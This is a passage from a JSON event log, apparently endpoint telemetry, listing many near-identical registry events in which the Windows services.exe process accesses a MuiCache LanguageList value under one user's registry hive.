"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
